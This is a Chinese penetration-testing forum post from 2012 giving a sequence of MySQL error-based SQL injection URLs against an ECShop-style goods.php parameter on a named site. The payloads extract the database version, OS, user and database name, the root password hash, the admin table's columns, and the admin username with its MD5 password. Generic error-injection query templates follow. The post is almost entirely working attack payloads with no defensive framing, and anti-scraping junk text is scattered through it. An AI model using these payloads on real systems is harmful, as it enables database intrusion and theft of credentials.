找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 盲注详细内容
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2059|回复: 0
打印 上一主题 下一主题

盲注详细内容

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-5 14:59:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
判断版本号 ' n  w6 ^2 r. R2 ^
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
3 B  B; q0 D  y
  N( g+ ]8 }7 ~% P3 K" y% W  O$ \判断系统7 q2 j7 K, @( q2 Q8 C, t! S. c. `
6 M+ E& v' \1 i( }2 {3 j# d5 U
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
& ]6 M0 P$ F8 Y. c( |
0 U/ Z4 W" G( |  b# g# B4 G2 h
( Y2 \# x8 u' A, s2 O
7 |; ]$ z2 z) b, G当前 user()2 ], g: W" m$ c8 `$ H
( `" ^5 L: W% ]
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
7 }+ l. S' u, n# z3 F  b# p
* d0 |9 M8 l0 w1 ?' g0 G- M( M! F0 t# Y' F- y9 r3 ^

  c  k$ E! n% h1 k, L6 H当前 database()+ B# k5 O7 ~, o8 Z: N! j+ `# m
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
2 v% O" K5 _$ l" V) p8 `
9 w1 F8 l  |6 r, H2 R) n" i  Q# \$ z$ m5 G8 Y
  `3 T1 d% p% _

. T2 S/ L5 v" c2 I: N9 ~root hash
2 U7 J- @' l$ P+ B3 _
7 @: o4 ~- T7 Zhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
4 ~6 }9 z5 O$ B
! _2 |" ^& q' ^, T+ n# `! J7 ]' k5 ^4 T' @3 Z) z5 S

- `( {: z/ z9 J1 k5 u0 N2 q+ N6 t当前 数据库表名
1 N9 q, L+ I8 x3 ~6 ^' X  Y# d4 z0 r, V4 C5 j$ W+ S% T
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23- D- T# o- \" |  t) T/ \

) q) A- m7 v; J( G& @3 [: ~" H* G4 X& T% S# k
1 }5 s* s- }9 G7 @
当前 数据库 user_name 字段$ F% [& R+ h! \. r
7 x- J8 ~. s( s8 r# l( F( O
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23: f7 E. O& M5 M! }. n) h9 q

$ D5 B/ {1 [0 b* I# z9 z当前 数据库 字段 password( {7 V' t0 ?$ ]7 w& b* P& C
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23# E5 c$ I, z- n% w

9 a) T3 X/ }, P4 v4 w" q" m, n7 ?1 V

6 ~% ~* j/ A- d获得 admin passwd(md5)
# {- @1 Z8 D3 d" N
  ~! m- E4 f! ]/ S& }
( I# o3 l7 K$ q4 m5 ^) C* M$ s' f6 shttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23* ]* {; H# ~! E$ a, ~" N

: E; i! {2 p( z: P! f2 p! Z' K7 z9 `报错注射
) y# k( q0 K2 y& u3 ?* kSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
% X- B" ~8 u; R8 s# V4 K% y
9 g. Q5 @, P+ RSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)/ e+ X* B& ~3 s4 |; G8 ^
7 O. }9 Z9 [+ Q) U; ]
and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表